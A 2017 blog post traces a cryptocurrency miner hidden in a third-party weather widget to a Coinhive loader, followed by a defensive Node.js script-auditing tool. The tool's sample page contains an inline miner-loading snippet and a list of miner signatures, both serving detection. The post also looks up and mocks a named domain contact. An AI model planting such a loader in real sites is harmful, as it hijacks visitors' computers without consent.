Nate Caroe - Dec 28, 2017

What Dangers are Hiding in Your Website's Third-Party Widgets?

If you visit roadrunnernm.com, you may notice one of two things. Either the fans in your computer will start to spin very fast and make a lot of noise or your antivirus will (hopefully) pop a friendly alert that something malicious is going on with your browser. Why? Because unsuspecting visitors to this site are being exposed to a *drum roll* cryptocurrency miner!

Unusual CPU Activity When Visiting a Website

Now, roadrunnernm.com isn't a fake company, and the webmaster isn't a malicious actor. So, how is this possible? Was roadrunnernm.com defaced? Actually, the problem lies in a small weather widget that's available on the site.

Weather Widget on Website

Firing up Burp Suite, we can see the requests being made through our proxy. The most recent request is made to a subdomain on coinhive.com, which is a glaring problem since I don't remember opting in to use the service. We can look at the previous request to get some insight on where this is coming from.

Using Burp Suite to see requests made through our proxy.

The weather widget makes a call back to weatherfor.us for local weather information, but it also sources an interesting JavaScript file, twantu.js, and calls the function RunAd(). Let's look at some source code!

Source Code Observations

Ah, well, of course it's minified, because the last thing you want is for your cryptocurrency mining boot script to take up more space than necessary.

Expanded Source Code

Much better. Clearly we see that twantu.js sources a JavaScript file from Coinhive and starts a miner using the referrer and a randomly generated key.

Obviously, the fault of roadrunnernm.com is that they are using an untrusted weather plugin, but is weatherfor.us a legitimate service that was breached, or is it the malicious actor? The twantu.js file is hosted on weatherfor.us under /static/js/twantu.js, so it's possible that an attacker gained access to the file system, uploaded this file, and modified the weather widget to source twantu.js. The problem with that theory, however, is that the referrer and random key aren't generated by JavaScript; they're created server-side by Express. A malicious actor would first need access to the application framework, which means having control over the web server.

A quick WHOIS for weatherfor.us:

WHOIS for weatherfor.us

Aaand a quick Google search:

Google Search of Administrative Contact's Name

Handsome looking guy! Unfortunately, I doubt Mr. Hassan created a weather widget that mines cryptocurrency. ¯\_(ツ)_/¯

The next question is, "How many sites are using this widget?" Well, this is where things get tricky. We can't Google Dork our way into finding which sites are using this, because the embed code is in the HTML source rather than in indexed page text. Using services like nerdydata.com and publicwww.com, we can tell there are about 300 websites using this widget, but we can't confirm most of these because they're hidden behind a paywall.

What do we take from this? Don't install or use untrusted third-party widgets or applications. Simple as that. Also, if you're using the weather widget from weatherfor.us, then maybe it's time to find a new one.
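The walk-through above boils down to a repeatable check: list every script a page loads, decide which origins you actually expect, and look for the loader that showed up in twantu.js. The Node.js script below is an added example written for this post; it is not code from the original article, from weatherfor.us, or from roadrunnernm.com. It assumes the Coinhive client identifiers CoinHive.Anonymous and coinhive.min.js from general knowledge of that library (the post itself only shows RunAd() and the coinhive.com subdomain), treats cdn.example.com as a constructed "reviewed" third-party origin, and runs offline against constructed sample HTML modelled on the post's description.

```javascript
// Added example (not code from the original post or from the sites it names):
// audit the <script> tags of a page the way the post did by hand in Burp Suite,
// flagging third-party script origins, missing Subresource Integrity, and
// indicators of the Coinhive loader. Uses only Node.js globals (URL).

// Hosts associated with in-browser mining. coinhive.com is named in the post;
// a real deployment would maintain this list from its own threat intel.
const MINER_HOSTS = ['coinhive.com'];

// Source-text signatures. RunAd( is the entry point named in the post;
// CoinHive.Anonymous and coinhive.min.js are the public Coinhive client
// names, assumed from general knowledge of that library (not shown on the page).
const MINER_SIGNATURES = [
  { name: 'coinhive-api', re: /CoinHive\.Anonymous/i },
  { name: 'coinhive-loader', re: /coinhive\.min\.js/i },
  { name: 'runad-entrypoint', re: /\bRunAd\s*\(/ },
];

// Naive registrable-domain helper: keeps the last two labels, which is fine
// for .com/.us but mishandles suffixes like co.uk (use a public suffix list
// in production).
function registrableDomain(hostname) {
  return hostname.split('.').slice(-2).join('.');
}

function isMinerHost(hostname) {
  return MINER_HOSTS.some((h) => hostname === h || hostname.endsWith('.' + h));
}

// Walk every <script> tag. External scripts are classified by origin;
// inline scripts are matched against the signature list.
function auditScripts(html, pageUrl, allowedOrigins = []) {
  const page = new URL(pageUrl);
  const findings = [];
  const scriptRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    const [, attrs, body] = m;
    const srcMatch = attrs.match(/\bsrc\s*=\s*["']([^"']+)["']/i);
    if (srcMatch) {
      const src = new URL(srcMatch[1], page); // resolves relative paths
      findings.push({
        kind: 'external',
        src: src.href,
        thirdParty: registrableDomain(src.hostname) !== registrableDomain(page.hostname),
        allowed: allowedOrigins.includes(src.origin),
        miner: isMinerHost(src.hostname),
        hasIntegrity: /\bintegrity\s*=/i.test(attrs),
      });
    } else {
      const signatures = MINER_SIGNATURES.filter((s) => s.re.test(body)).map((s) => s.name);
      if (signatures.length > 0) {
        findings.push({ kind: 'inline', miner: true, signatures });
      }
    }
  }
  return findings;
}

// Derive a Content-Security-Policy script-src directive from the audit: the
// page's own origin plus reviewed third-party origins only. A script injected
// later by a widget (the coinhive.com loader here) would not be on the list.
function suggestScriptSrc(findings) {
  const origins = new Set();
  for (const f of findings) {
    if (f.kind === 'external' && f.thirdParty && f.allowed && !f.miner) {
      origins.add(new URL(f.src).origin);
    }
  }
  return ["script-src 'self'", ...origins].join(' ');
}

// Constructed sample page: a first-party script, the weatherfor.us widget,
// a reviewed CDN with SRI, and an inline boot script like the expanded twantu.js.
const SAMPLE_HTML = `
<html><head>
<script src="/static/js/app.js"></script>
<script src="https://weatherfor.us/static/js/twantu.js"></script>
<script src="https://cdn.example.com/lib.js" integrity="sha384-PLACEHOLDER"></script>
<script>
  var s = document.createElement('script');
  s.src = 'https://coinhive.com/lib/coinhive.min.js';
  document.head.appendChild(s);
  RunAd();
</script>
</head><body></body></html>`;
const SAMPLE_PAGE = 'https://roadrunnernm.com/';
const REVIEWED_ORIGINS = ['https://cdn.example.com']; // constructed allowlist

function runDemo() {
  const findings = auditScripts(SAMPLE_HTML, SAMPLE_PAGE, REVIEWED_ORIGINS);
  console.log(JSON.stringify(findings, null, 2));
  console.log(suggestScriptSrc(findings));
  return findings;
}

runDemo();
```

Two design points worth noting. Subresource Integrity only helps for scripts whose content you can pin, so it would not have caught a widget host that serves a changed file on purpose; the script-src directive complements it by blocking the second-stage loader the widget pulls from coinhive.com even when the widget's own origin is allowed. And because the miner key and referrer were generated server-side, nothing in the served JavaScript looks unusual until you follow the request chain, which is why the audit looks at where scripts come from and not just what they contain.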

